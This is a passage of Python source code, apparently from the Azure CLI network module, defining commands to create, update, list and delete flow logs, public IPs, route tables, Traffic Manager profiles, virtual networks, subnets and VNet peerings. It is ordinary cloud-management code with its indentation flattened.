}
else:
# pylint: disable=line-too-long
with cmd.update_context(config.flow_analytics_configuration.network_watcher_flow_analytics_configuration) as c:
# update object
c.set_param('enabled', traffic_analytics_enabled)
if traffic_analytics_workspace == "":
config.flow_analytics_configuration = None
elif workspace:
c.set_param('workspace_id', workspace.properties['customerId'])
c.set_param('workspace_region', workspace.location)
c.set_param('workspace_resource_id', traffic_analytics_workspace)
c.set_param('traffic_analytics_interval', traffic_analytics_interval)
return client.begin_set_flow_log_configuration(watcher_rg, watcher_name, config)
# The combination of resource_group_name and nsg is used for the legacy (deprecated) output,
# while the combination of location and flow_log_name is used for the new flow-log output.
def show_nsg_flow_logging(cmd, client, watcher_rg, watcher_name, location=None, resource_group_name=None, nsg=None,
flow_log_name=None):
# deprecated approach to show flow log
if nsg is not None:
flowlog_status_parameters = cmd.get_models('FlowLogStatusParameters')(target_resource_id=nsg)
return client.begin_get_flow_log_status(watcher_rg, watcher_name, flowlog_status_parameters)
# new approach to show flow log
from ._client_factory import cf_flow_logs
client = cf_flow_logs(cmd.cli_ctx, None)
return client.get(watcher_rg, watcher_name, flow_log_name)
def create_nw_flow_log(cmd,
client,
location,
watcher_rg,
watcher_name,
flow_log_name,
nsg,
storage_account=None,
resource_group_name=None,
enabled=None,
retention=0,
log_format=None,
log_version=None,
traffic_analytics_workspace=None,
traffic_analytics_interval=60,
traffic_analytics_enabled=None,
tags=None):
FlowLog = cmd.get_models('FlowLog')
flow_log = FlowLog(location=location,
target_resource_id=nsg,
storage_id=storage_account,
enabled=enabled,
tags=tags)
if retention > 0:
RetentionPolicyParameters = cmd.get_models('RetentionPolicyParameters')
retention_policy = RetentionPolicyParameters(days=retention, enabled=(retention > 0))
flow_log.retention_policy = retention_policy
if log_format is not None or log_version is not None:
FlowLogFormatParameters = cmd.get_models('FlowLogFormatParameters')
format_config = FlowLogFormatParameters(type=log_format, version=log_version)
flow_log.format = format_config
if traffic_analytics_workspace is not None:
TrafficAnalyticsProperties, TrafficAnalyticsConfigurationProperties = \
cmd.get_models('TrafficAnalyticsProperties', 'TrafficAnalyticsConfigurationProperties')
from azure.cli.core.commands.arm import get_arm_resource_by_id
workspace = get_arm_resource_by_id(cmd.cli_ctx, traffic_analytics_workspace)
if not workspace:
raise CLIError('Name or ID of workspace is invalid')
traffic_analytics_config = TrafficAnalyticsConfigurationProperties(
enabled=traffic_analytics_enabled,
workspace_id=workspace.properties['customerId'],
workspace_region=workspace.location,
workspace_resource_id=workspace.id,
traffic_analytics_interval=traffic_analytics_interval
)
traffic_analytics = TrafficAnalyticsProperties(
network_watcher_flow_analytics_configuration=traffic_analytics_config
)
flow_log.flow_analytics_configuration = traffic_analytics
return client.begin_create_or_update(watcher_rg, watcher_name, flow_log_name, flow_log)
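# The getter/setter pair below follows the usual azure-cli convention for generic update commands:
# the getter fetches the current FlowLog, update_nw_flow_log mutates it in memory, and the setter
# writes the modified object back with begin_create_or_update.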
def update_nw_flow_log_getter(client, watcher_rg, watcher_name, flow_log_name):
return client.get(watcher_rg, watcher_name, flow_log_name)
def update_nw_flow_log_setter(client, watcher_rg, watcher_name, flow_log_name, parameters):
return client.begin_create_or_update(watcher_rg, watcher_name, flow_log_name, parameters)
def update_nw_flow_log(cmd,
instance,
location,
resource_group_name=None,  # placeholder parameter so it appears in the command's argument list
enabled=None,
nsg=None,
storage_account=None,
retention=0,
log_format=None,
log_version=None,
traffic_analytics_workspace=None,
traffic_analytics_interval=60,
traffic_analytics_enabled=None,
tags=None):
with cmd.update_context(instance) as c:
c.set_param('enabled', enabled)
c.set_param('tags', tags)
c.set_param('storage_id', storage_account)
c.set_param('target_resource_id', nsg)
with cmd.update_context(instance.retention_policy) as c:
c.set_param('days', retention)
c.set_param('enabled', retention > 0)
with cmd.update_context(instance.format) as c:
c.set_param('type', log_format)
c.set_param('version', log_version)
if traffic_analytics_workspace is not None:
from azure.cli.core.commands.arm import get_arm_resource_by_id
workspace = get_arm_resource_by_id(cmd.cli_ctx, traffic_analytics_workspace)
if not workspace:
raise CLIError('Name or ID of workspace is invalid')
if instance.flow_analytics_configuration.network_watcher_flow_analytics_configuration is None:
analytics_conf = cmd.get_models('TrafficAnalyticsConfigurationProperties')
instance.flow_analytics_configuration.network_watcher_flow_analytics_configuration = analytics_conf()
with cmd.update_context(
instance.flow_analytics_configuration.network_watcher_flow_analytics_configuration) as c:
c.set_param('enabled', traffic_analytics_enabled)
c.set_param('workspace_id', workspace.properties['customerId'])
c.set_param('workspace_region', workspace.location)
c.set_param('workspace_resource_id', workspace.id)
c.set_param('traffic_analytics_interval', traffic_analytics_interval)
return instance
def list_nw_flow_log(client, watcher_rg, watcher_name, location):
return client.list(watcher_rg, watcher_name)
def delete_nw_flow_log(client, watcher_rg, watcher_name, location, flow_log_name):
return client.begin_delete(watcher_rg, watcher_name, flow_log_name)
def start_nw_troubleshooting(cmd, client, watcher_name, watcher_rg, resource, storage_account,
storage_path, resource_type=None, resource_group_name=None,
no_wait=False):
TroubleshootingParameters = cmd.get_models('TroubleshootingParameters')
params = TroubleshootingParameters(target_resource_id=resource, storage_id=storage_account,
storage_path=storage_path)
return sdk_no_wait(no_wait, client.begin_get_troubleshooting, watcher_rg, watcher_name, params)
def show_nw_troubleshooting_result(cmd, client, watcher_name, watcher_rg, resource, resource_type=None,
resource_group_name=None):
query_troubleshooting_parameters = cmd.get_models('QueryTroubleshootingParameters')(target_resource_id=resource)
return client.begin_get_troubleshooting_result(watcher_rg, watcher_name, query_troubleshooting_parameters)
def run_network_configuration_diagnostic(cmd, client, watcher_rg, watcher_name, resource,
direction=None, protocol=None, source=None, destination=None,
destination_port=None, queries=None,
resource_group_name=None, resource_type=None, parent=None):
NetworkConfigurationDiagnosticParameters, NetworkConfigurationDiagnosticProfile = \
cmd.get_models('NetworkConfigurationDiagnosticParameters', 'NetworkConfigurationDiagnosticProfile')
if not queries:
queries = [NetworkConfigurationDiagnosticProfile(
direction=direction,
protocol=protocol,
source=source,
destination=destination,
destination_port=destination_port
)]
params = NetworkConfigurationDiagnosticParameters(target_resource_id=resource, profiles=queries)
return client.begin_get_network_configuration_diagnostic(watcher_rg, watcher_name, params)
# endregion
# region CustomIpPrefix
def create_custom_ip_prefix(cmd, client, resource_group_name, custom_ip_prefix_name, location=None,
cidr=None, tags=None, zone=None, signed_message=None, authorization_message=None,
custom_ip_prefix_parent=None, no_wait=False):
CustomIpPrefix = cmd.get_models('CustomIpPrefix')
prefix = CustomIpPrefix(
location=location,
cidr=cidr,
zones=zone,
tags=tags,
signed_message=signed_message,
authorization_message=authorization_message
)
if custom_ip_prefix_parent:
try:
prefix.custom_ip_prefix_parent = client.get(resource_group_name, custom_ip_prefix_parent)
except ResourceNotFoundError:
raise ResourceNotFoundError("Custom ip prefix parent {} doesn't exist".format(custom_ip_prefix_parent))
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, custom_ip_prefix_name, prefix)
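# update_custom_ip_prefix capitalizes the supplied commissioned_state value and appends 'ing',
# e.g. 'commission' -> 'Commissioning' and 'decommission' -> 'Decommissioning'; presumably this
# maps the CLI verb onto the service-side CommissionedState value (the enum name is an assumption,
# only the string handling is taken from the code below).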
def update_custom_ip_prefix(instance,
signed_message=None,
authorization_message=None,
tags=None,
commissioned_state=None):
if tags is not None:
instance.tags = tags
if signed_message is not None:
instance.signed_message = signed_message
if authorization_message is not None:
instance.authorization_message = authorization_message
if commissioned_state is not None:
instance.commissioned_state = commissioned_state[0].upper() + commissioned_state[1:] + 'ing'
return instance
# endregion
# region PublicIPAddresses
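# When allocation_method is omitted, create_public_ip defaults to Static for a Standard SKU and to
# Dynamic otherwise, and only sets version/zones/ip-tags/prefix fields supported by the API version
# in use.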
def create_public_ip(cmd, resource_group_name, public_ip_address_name, location=None, tags=None,
allocation_method=None, dns_name=None,
idle_timeout=4, reverse_fqdn=None, version=None, sku=None, tier=None, zone=None, ip_tags=None,
public_ip_prefix=None, edge_zone=None, ip_address=None):
IPAllocationMethod, PublicIPAddress, PublicIPAddressDnsSettings, SubResource = cmd.get_models(
'IPAllocationMethod', 'PublicIPAddress', 'PublicIPAddressDnsSettings', 'SubResource')
client = network_client_factory(cmd.cli_ctx).public_ip_addresses
if not allocation_method:
allocation_method = IPAllocationMethod.static.value if (sku and sku.lower() == 'standard') \
else IPAllocationMethod.dynamic.value
public_ip_args = {
'location': location,
'tags': tags,
'public_ip_allocation_method': allocation_method,
'idle_timeout_in_minutes': idle_timeout,
'ip_address': ip_address,
'dns_settings': None
}
if cmd.supported_api_version(min_api='2016-09-01'):
public_ip_args['public_ip_address_version'] = version
if cmd.supported_api_version(min_api='2017-06-01'):
public_ip_args['zones'] = zone
if cmd.supported_api_version(min_api='2017-11-01'):
public_ip_args['ip_tags'] = ip_tags
if cmd.supported_api_version(min_api='2018-07-01') and public_ip_prefix:
public_ip_args['public_ip_prefix'] = SubResource(id=public_ip_prefix)
if sku:
public_ip_args['sku'] = {'name': sku}
if tier:
if not sku:
public_ip_args['sku'] = {'name': 'Basic'}
public_ip_args['sku'].update({'tier': tier})
public_ip = PublicIPAddress(**public_ip_args)
if dns_name or reverse_fqdn:
public_ip.dns_settings = PublicIPAddressDnsSettings(
domain_name_label=dns_name,
reverse_fqdn=reverse_fqdn)
if edge_zone:
public_ip.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, public_ip_address_name, public_ip)
def update_public_ip(cmd, instance, dns_name=None, allocation_method=None, version=None,
idle_timeout=None, reverse_fqdn=None, tags=None, sku=None, ip_tags=None,
public_ip_prefix=None):
if dns_name is not None or reverse_fqdn is not None:
if instance.dns_settings:
if dns_name is not None:
instance.dns_settings.domain_name_label = dns_name
if reverse_fqdn is not None:
instance.dns_settings.reverse_fqdn = reverse_fqdn
else:
PublicIPAddressDnsSettings = cmd.get_models('PublicIPAddressDnsSettings')
instance.dns_settings = PublicIPAddressDnsSettings(domain_name_label=dns_name, fqdn=None,
reverse_fqdn=reverse_fqdn)
if allocation_method is not None:
instance.public_ip_allocation_method = allocation_method
if version is not None:
instance.public_ip_address_version = version
if idle_timeout is not None:
instance.idle_timeout_in_minutes = idle_timeout
if tags is not None:
instance.tags = tags
if sku is not None:
instance.sku.name = sku
if ip_tags:
instance.ip_tags = ip_tags
if public_ip_prefix:
SubResource = cmd.get_models('SubResource')
instance.public_ip_prefix = SubResource(id=public_ip_prefix)
return instance
def create_public_ip_prefix(cmd, client, resource_group_name, public_ip_prefix_name, prefix_length,
version=None, location=None, tags=None, zone=None, edge_zone=None,
custom_ip_prefix_name=None):
PublicIPPrefix, PublicIPPrefixSku = cmd.get_models('PublicIPPrefix', 'PublicIPPrefixSku')
prefix = PublicIPPrefix(
location=location,
prefix_length=prefix_length,
sku=PublicIPPrefixSku(name='Standard'),
tags=tags,
zones=zone
)
if cmd.supported_api_version(min_api='2019-08-01'):
prefix.public_ip_address_version = version if version is not None else 'ipv4'
if cmd.supported_api_version(min_api='2020-06-01') and custom_ip_prefix_name:
cip_client = network_client_factory(cmd.cli_ctx).custom_ip_prefixes
try:
prefix.custom_ip_prefix = cip_client.get(resource_group_name, custom_ip_prefix_name)
except ResourceNotFoundError:
raise ResourceNotFoundError('Custom ip prefix {} doesn\'t exist.'.format(custom_ip_prefix_name))
if edge_zone:
prefix.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, public_ip_prefix_name, prefix)
def update_public_ip_prefix(instance, tags=None):
if tags is not None:
instance.tags = tags
return instance
# endregion
# region RouteFilters
def create_route_filter(cmd, client, resource_group_name, route_filter_name, location=None, tags=None):
RouteFilter = cmd.get_models('RouteFilter')
return client.begin_create_or_update(resource_group_name, route_filter_name,
RouteFilter(location=location, tags=tags))
def list_route_filters(client, resource_group_name=None):
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
def create_route_filter_rule(cmd, client, resource_group_name, route_filter_name, rule_name, access, communities,
location=None):
RouteFilterRule = cmd.get_models('RouteFilterRule')
return client.begin_create_or_update(resource_group_name, route_filter_name, rule_name,
RouteFilterRule(access=access, communities=communities,
location=location))
# endregion
# region RouteTables
def create_route_table(cmd, resource_group_name, route_table_name, location=None, tags=None,
disable_bgp_route_propagation=None):
RouteTable = cmd.get_models('RouteTable')
ncf = network_client_factory(cmd.cli_ctx)
route_table = RouteTable(location=location, tags=tags)
if cmd.supported_api_version(min_api='2017-10-01'):
route_table.disable_bgp_route_propagation = disable_bgp_route_propagation
return ncf.route_tables.begin_create_or_update(resource_group_name, route_table_name, route_table)
def update_route_table(instance, tags=None, disable_bgp_route_propagation=None):
if tags == '':
instance.tags = None
elif tags is not None:
instance.tags = tags
if disable_bgp_route_propagation is not None:
instance.disable_bgp_route_propagation = disable_bgp_route_propagation
return instance
def create_route(cmd, resource_group_name, route_table_name, route_name, next_hop_type, address_prefix,
next_hop_ip_address=None):
Route = cmd.get_models('Route')
route = Route(next_hop_type=next_hop_type, address_prefix=address_prefix,
next_hop_ip_address=next_hop_ip_address, name=route_name)
ncf = network_client_factory(cmd.cli_ctx)
return ncf.routes.begin_create_or_update(resource_group_name, route_table_name, route_name, route)
def update_route(instance, address_prefix=None, next_hop_type=None, next_hop_ip_address=None):
if address_prefix is not None:
instance.address_prefix = address_prefix
if next_hop_type is not None:
instance.next_hop_type = next_hop_type
if next_hop_ip_address is not None:
instance.next_hop_ip_address = next_hop_ip_address
return instance
# endregion
# region ServiceEndpoints
def create_service_endpoint_policy(cmd, resource_group_name, service_endpoint_policy_name, location=None, tags=None):
client = network_client_factory(cmd.cli_ctx).service_endpoint_policies
ServiceEndpointPolicy = cmd.get_models('ServiceEndpointPolicy')
policy = ServiceEndpointPolicy(tags=tags, location=location)
return client.begin_create_or_update(resource_group_name, service_endpoint_policy_name, policy)
def list_service_endpoint_policies(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).service_endpoint_policies
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
def update_service_endpoint_policy(instance, tags=None):
if tags is not None:
instance.tags = tags
return instance
def create_service_endpoint_policy_definition(cmd, resource_group_name, service_endpoint_policy_name,
service_endpoint_policy_definition_name, service, service_resources,
description=None):
client = network_client_factory(cmd.cli_ctx).service_endpoint_policy_definitions
ServiceEndpointPolicyDefinition = cmd.get_models('ServiceEndpointPolicyDefinition')
policy_def = ServiceEndpointPolicyDefinition(description=description, service=service,
service_resources=service_resources)
return client.begin_create_or_update(resource_group_name, service_endpoint_policy_name,
service_endpoint_policy_definition_name, policy_def)
def update_service_endpoint_policy_definition(instance, service=None, service_resources=None, description=None):
if service is not None:
instance.service = service
if service_resources is not None:
instance.service_resources = service_resources
if description is not None:
instance.description = description
return instance
# endregion
# region TrafficManagers
def list_traffic_manager_profiles(cmd, resource_group_name=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
client = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).profiles
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list_by_subscription()
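# create_traffic_manager_profile defaults the monitor path to '/' when the protocol is HTTP and no
# explicit path is given; profiles are always created in the 'global' location because Traffic
# Manager is not a regional resource.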
def create_traffic_manager_profile(cmd, traffic_manager_profile_name, resource_group_name,
routing_method, unique_dns_name, monitor_path=None,
monitor_port=80, monitor_protocol=MonitorProtocol.http.value,
profile_status=ProfileStatus.enabled.value,
ttl=30, tags=None, interval=None, timeout=None, max_failures=None,
monitor_custom_headers=None, status_code_ranges=None, max_return=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
from azure.mgmt.trafficmanager.models import Profile, DnsConfig, MonitorConfig
client = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).profiles
if monitor_path is None and monitor_protocol == 'HTTP':
monitor_path = '/'
profile = Profile(location='global', tags=tags, profile_status=profile_status,
traffic_routing_method=routing_method,
dns_config=DnsConfig(relative_name=unique_dns_name, ttl=ttl),
monitor_config=MonitorConfig(protocol=monitor_protocol,
port=monitor_port,
path=monitor_path,
interval_in_seconds=interval,
timeout_in_seconds=timeout,
tolerated_number_of_failures=max_failures,
custom_headers=monitor_custom_headers,
expected_status_code_ranges=status_code_ranges),
max_return=max_return)
return client.create_or_update(resource_group_name, traffic_manager_profile_name, profile)
def update_traffic_manager_profile(instance, profile_status=None, routing_method=None, tags=None,
monitor_protocol=None, monitor_port=None, monitor_path=None,
ttl=None, timeout=None, interval=None, max_failures=None,
monitor_custom_headers=None, status_code_ranges=None, max_return=None):
if tags is not None:
instance.tags = tags
if profile_status is not None:
instance.profile_status = profile_status
if routing_method is not None:
instance.traffic_routing_method = routing_method
if ttl is not None:
instance.dns_config.ttl = ttl
if monitor_protocol is not None:
instance.monitor_config.protocol = monitor_protocol
if monitor_port is not None:
instance.monitor_config.port = monitor_port
if monitor_path == '':
instance.monitor_config.path = None
elif monitor_path is not None:
instance.monitor_config.path = monitor_path
if interval is not None:
instance.monitor_config.interval_in_seconds = interval
if timeout is not None:
instance.monitor_config.timeout_in_seconds = timeout
if max_failures is not None:
instance.monitor_config.tolerated_number_of_failures = max_failures
if monitor_custom_headers is not None:
instance.monitor_config.custom_headers = monitor_custom_headers
if status_code_ranges is not None:
instance.monitor_config.expected_status_code_ranges = status_code_ranges
if max_return is not None:
instance.max_return = max_return
# TODO: Remove workaround after https://github.com/Azure/azure-rest-api-specs/issues/1940 fixed
for endpoint in instance.endpoints:
endpoint._validation = { # pylint: disable=protected-access
'name': {'readonly': False},
'type': {'readonly': False},
}
return instance
def create_traffic_manager_endpoint(cmd, resource_group_name, profile_name, endpoint_type, endpoint_name,
target_resource_id=None, target=None,
endpoint_status=None, weight=None, priority=None,
endpoint_location=None, endpoint_monitor_status=None,
min_child_endpoints=None, geo_mapping=None,
monitor_custom_headers=None, subnets=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
from azure.mgmt.trafficmanager.models import Endpoint
ncf = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).endpoints
endpoint = Endpoint(target_resource_id=target_resource_id, target=target,
endpoint_status=endpoint_status, weight=weight, priority=priority,
endpoint_location=endpoint_location,
endpoint_monitor_status=endpoint_monitor_status,
min_child_endpoints=min_child_endpoints,
geo_mapping=geo_mapping,
subnets=subnets,
custom_headers=monitor_custom_headers)
return ncf.create_or_update(resource_group_name, profile_name, endpoint_type, endpoint_name,
endpoint)
def update_traffic_manager_endpoint(instance, endpoint_type=None, endpoint_location=None,
endpoint_status=None, endpoint_monitor_status=None,
priority=None, target=None, target_resource_id=None,
weight=None, min_child_endpoints=None, geo_mapping=None,
subnets=None, monitor_custom_headers=None):
if endpoint_location is not None:
instance.endpoint_location = endpoint_location
if endpoint_status is not None:
instance.endpoint_status = endpoint_status
if endpoint_monitor_status is not None:
instance.endpoint_monitor_status = endpoint_monitor_status
if priority is not None:
instance.priority = priority
if target is not None:
instance.target = target
if target_resource_id is not None:
instance.target_resource_id = target_resource_id
if weight is not None:
instance.weight = weight
if min_child_endpoints is not None:
instance.min_child_endpoints = min_child_endpoints
if geo_mapping is not None:
instance.geo_mapping = geo_mapping
if subnets is not None:
instance.subnets = subnets
if monitor_custom_headers:
instance.custom_headers = monitor_custom_headers
return instance
def list_traffic_manager_endpoints(cmd, resource_group_name, profile_name, endpoint_type=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
client = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).profiles
profile = client.get(resource_group_name, profile_name)
return [e for e in profile.endpoints if not endpoint_type or e.type.endswith(endpoint_type)]
# endregion
# region VirtualNetworks
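# For API versions >= 2018-08-01, a single subnet prefix is stored in address_prefix and multiple
# prefixes in address_prefixes; older API versions only accept the scalar address_prefix.
# Minimal illustrative call (hypothetical names; cmd is provided by the CLI framework):
#   create_vnet(cmd, 'rg', 'vnet1', vnet_prefixes='10.0.0.0/16',
#               subnet_name='default', subnet_prefix=['10.0.0.0/24'])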
# pylint: disable=too-many-locals
def create_vnet(cmd, resource_group_name, vnet_name, vnet_prefixes='10.0.0.0/16',
subnet_name=None, subnet_prefix=None, dns_servers=None,
location=None, tags=None, vm_protection=None, ddos_protection=None, bgp_community=None,
ddos_protection_plan=None, network_security_group=None, edge_zone=None, flowtimeout=None,
enable_encryption=None, encryption_enforcement_policy=None):
AddressSpace, DhcpOptions, Subnet, VirtualNetwork, SubResource, NetworkSecurityGroup = \
cmd.get_models('AddressSpace', 'DhcpOptions', 'Subnet', 'VirtualNetwork',
'SubResource', 'NetworkSecurityGroup')
client = network_client_factory(cmd.cli_ctx).virtual_networks
tags = tags or {}
vnet = VirtualNetwork(
location=location, tags=tags,
dhcp_options=DhcpOptions(dns_servers=dns_servers),
address_space=AddressSpace(address_prefixes=(vnet_prefixes if isinstance(vnet_prefixes, list) else [vnet_prefixes]))) # pylint: disable=line-too-long
if subnet_name:
if cmd.supported_api_version(min_api='2018-08-01'):
vnet.subnets = [Subnet(name=subnet_name,
address_prefix=subnet_prefix[0] if len(subnet_prefix) == 1 else None,
address_prefixes=subnet_prefix if len(subnet_prefix) > 1 else None,
network_security_group=NetworkSecurityGroup(id=network_security_group)
if network_security_group else None)]
else:
vnet.subnets = [Subnet(name=subnet_name, address_prefix=subnet_prefix)]
if cmd.supported_api_version(min_api='2017-09-01'):
vnet.enable_ddos_protection = ddos_protection
vnet.enable_vm_protection = vm_protection
if cmd.supported_api_version(min_api='2018-02-01'):
vnet.ddos_protection_plan = SubResource(id=ddos_protection_plan) if ddos_protection_plan else None
if edge_zone:
vnet.extended_location = _edge_zone_model(cmd, edge_zone)
if flowtimeout is not None:
vnet.flow_timeout_in_minutes = flowtimeout
if bgp_community is not None and cmd.supported_api_version(min_api='2020-06-01'):
VirtualNetworkBgpCommunities = cmd.get_models('VirtualNetworkBgpCommunities')
vnet.bgp_communities = VirtualNetworkBgpCommunities(virtual_network_community=bgp_community)
if enable_encryption is not None:
if not vnet.encryption:
vnet.encryption = {}
vnet.encryption["enabled"] = enable_encryption
if encryption_enforcement_policy is not None:
if not vnet.encryption:
raise ArgumentUsageError('usage error: --encryption-enforcement-policy is only configurable when '
'--enable-encryption is specified.')
vnet.encryption["enforcement"] = encryption_enforcement_policy
return cached_put(cmd, client.begin_create_or_update, vnet, resource_group_name, vnet_name)
def update_vnet(cmd, instance, vnet_prefixes=None, dns_servers=None, ddos_protection=None, vm_protection=None,
ddos_protection_plan=None, flowtimeout=None, bgp_community=None, enable_encryption=None,
encryption_enforcement_policy=None):
# Server-side validation reports a clear error message for an invalid CIDR,
# so we don't validate on the client side.
AddressSpace, DhcpOptions, SubResource = cmd.get_models('AddressSpace', 'DhcpOptions', 'SubResource')
if vnet_prefixes and instance.address_space:
instance.address_space.address_prefixes = vnet_prefixes
elif vnet_prefixes:
instance.address_space = AddressSpace(address_prefixes=vnet_prefixes)
if dns_servers == ['']:
instance.dhcp_options.dns_servers = None
elif dns_servers and instance.dhcp_options:
instance.dhcp_options.dns_servers = dns_servers
elif dns_servers:
instance.dhcp_options = DhcpOptions(dns_servers=dns_servers)
if ddos_protection is not None:
instance.enable_ddos_protection = ddos_protection
if vm_protection is not None:
instance.enable_vm_protection = vm_protection
if ddos_protection_plan == '':
instance.ddos_protection_plan = None
elif ddos_protection_plan is not None:
instance.ddos_protection_plan = SubResource(id=ddos_protection_plan)
if flowtimeout is not None:
instance.flow_timeout_in_minutes = flowtimeout
if bgp_community is not None and cmd.supported_api_version(min_api='2020-06-01'):
VirtualNetworkBgpCommunities = cmd.get_models('VirtualNetworkBgpCommunities')
instance.bgp_communities = VirtualNetworkBgpCommunities(virtual_network_community=bgp_community)
if enable_encryption is not None:
if not instance.encryption:
VirtualNetworkEncryption = cmd.get_models('VirtualNetworkEncryption')
instance.encryption = VirtualNetworkEncryption(enabled=enable_encryption)
instance.encryption.enabled = enable_encryption
if encryption_enforcement_policy is not None:
if not instance.encryption:
raise ArgumentUsageError('usage error: --encryption-enforcement-policy is only configurable when '
'--enable-encryption is specified.')
instance.encryption.enforcement = encryption_enforcement_policy
return instance
def _set_route_table(ncf, resource_group_name, route_table, subnet):
if route_table:
is_id = is_valid_resource_id(route_table)
rt = None
if is_id:
res_id = parse_resource_id(route_table)
rt = ncf.route_tables.get(res_id['resource_group'], res_id['name'])
else:
rt = ncf.route_tables.get(resource_group_name, route_table)
subnet.route_table = rt
elif route_table == '':
subnet.route_table = None
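# Subnets are not created through a dedicated subnet client here: create_subnet reads the parent
# VNet (cached_get), upserts the new Subnet into vnet.subnets by name, writes the whole VNet back
# with cached_put, and returns the matching subnet from the updated resource.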
def create_subnet(cmd, resource_group_name, virtual_network_name, subnet_name,
address_prefix, network_security_group=None,
route_table=None, service_endpoints=None, service_endpoint_policy=None,
delegations=None, nat_gateway=None,
disable_private_endpoint_network_policies=None,
disable_private_link_service_network_policies=None):
NetworkSecurityGroup, ServiceEndpoint, Subnet, SubResource = cmd.get_models(
'NetworkSecurityGroup', 'ServiceEndpointPropertiesFormat', 'Subnet', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
if cmd.supported_api_version(min_api='2018-08-01'):
subnet = Subnet(
name=subnet_name,
address_prefixes=address_prefix if len(address_prefix) > 1 else None,
address_prefix=address_prefix[0] if len(address_prefix) == 1 else None
)
if cmd.supported_api_version(min_api='2019-02-01') and nat_gateway:
subnet.nat_gateway = SubResource(id=nat_gateway)
else:
subnet = Subnet(name=subnet_name, address_prefix=address_prefix)
if network_security_group:
subnet.network_security_group = NetworkSecurityGroup(id=network_security_group)
_set_route_table(ncf, resource_group_name, route_table, subnet)
if service_endpoints:
subnet.service_endpoints = []
for service in service_endpoints:
subnet.service_endpoints.append(ServiceEndpoint(service=service))
if service_endpoint_policy:
subnet.service_endpoint_policies = []
for policy in service_endpoint_policy:
subnet.service_endpoint_policies.append(SubResource(id=policy))
if delegations:
subnet.delegations = delegations
if disable_private_endpoint_network_policies is True:
subnet.private_endpoint_network_policies = "Disabled"
if disable_private_endpoint_network_policies is False:
subnet.private_endpoint_network_policies = "Enabled"
if disable_private_link_service_network_policies is True:
subnet.private_link_service_network_policies = "Disabled"
if disable_private_link_service_network_policies is False:
subnet.private_link_service_network_policies = "Enabled"
vnet = cached_get(cmd, ncf.virtual_networks.get, resource_group_name, virtual_network_name)
upsert_to_collection(vnet, 'subnets', subnet, 'name')
vnet = cached_put(
cmd, ncf.virtual_networks.begin_create_or_update, vnet, resource_group_name, virtual_network_name).result()
return get_property(vnet.subnets, subnet_name)
def update_subnet(cmd, instance, resource_group_name, address_prefix=None, network_security_group=None,
route_table=None, service_endpoints=None, delegations=None, nat_gateway=None,
service_endpoint_policy=None, disable_private_endpoint_network_policies=None,
disable_private_link_service_network_policies=None):
NetworkSecurityGroup, ServiceEndpoint, SubResource = cmd.get_models(
'NetworkSecurityGroup', 'ServiceEndpointPropertiesFormat', 'SubResource')
if address_prefix:
if cmd.supported_api_version(min_api='2018-08-01'):
instance.address_prefixes = address_prefix if len(address_prefix) > 1 else None
instance.address_prefix = address_prefix[0] if len(address_prefix) == 1 else None
else:
instance.address_prefix = address_prefix
if cmd.supported_api_version(min_api='2019-02-01') and nat_gateway:
instance.nat_gateway = SubResource(id=nat_gateway)
elif nat_gateway == '':
instance.nat_gateway = None
if network_security_group:
instance.network_security_group = NetworkSecurityGroup(id=network_security_group)
elif network_security_group == '': # clear it
instance.network_security_group = None
_set_route_table(network_client_factory(cmd.cli_ctx), resource_group_name, route_table, instance)
if service_endpoints == ['']:
instance.service_endpoints = None
elif service_endpoints:
instance.service_endpoints = []
for service in service_endpoints:
instance.service_endpoints.append(ServiceEndpoint(service=service))
if service_endpoint_policy == '':
instance.service_endpoint_policies = None
elif service_endpoint_policy:
instance.service_endpoint_policies = []
for policy in service_endpoint_policy:
instance.service_endpoint_policies.append(SubResource(id=policy))
if delegations:
instance.delegations = delegations
if disable_private_endpoint_network_policies:
instance.private_endpoint_network_policies = "Disabled"
elif disable_private_endpoint_network_policies is not None:
instance.private_endpoint_network_policies = "Enabled"
if disable_private_link_service_network_policies:
instance.private_link_service_network_policies = "Disabled"
elif disable_private_link_service_network_policies is not None:
instance.private_link_service_network_policies = "Enabled"
return instance
def list_avail_subnet_delegations(cmd, resource_group_name=None, location=None):
client = network_client_factory(cmd.cli_ctx)
if resource_group_name:
return client.available_resource_group_delegations.list(location, resource_group_name)
return client.available_delegations.list(location)
def create_vnet_peering(cmd, resource_group_name, virtual_network_name, virtual_network_peering_name,
remote_virtual_network, allow_virtual_network_access=False,
allow_forwarded_traffic=False, allow_gateway_transit=False,
use_remote_gateways=False):
if not is_valid_resource_id(remote_virtual_network):
remote_virtual_network = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=remote_virtual_network
)
SubResource, VirtualNetworkPeering = cmd.get_models('SubResource', 'VirtualNetworkPeering')
peering = VirtualNetworkPeering(
id=resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=virtual_network_name),
name=virtual_network_peering_name,
remote_virtual_network=SubResource(id=remote_virtual_network),
allow_virtual_network_access=allow_virtual_network_access,
allow_gateway_transit=allow_gateway_transit,
allow_forwarded_traffic=allow_forwarded_traffic,
use_remote_gateways=use_remote_gateways)
aux_subscription = parse_resource_id(remote_virtual_network)['subscription']
ncf = network_client_factory(cmd.cli_ctx, aux_subscriptions=[aux_subscription])
return ncf.virtual_network_peerings.begin_create_or_update(
resource_group_name, virtual_network_name, virtual_network_peering_name, peering)
def update_vnet_peering(cmd, resource_group_name, virtual_network_name, virtual_network_peering_name, **kwargs):
peering = kwargs['parameters']
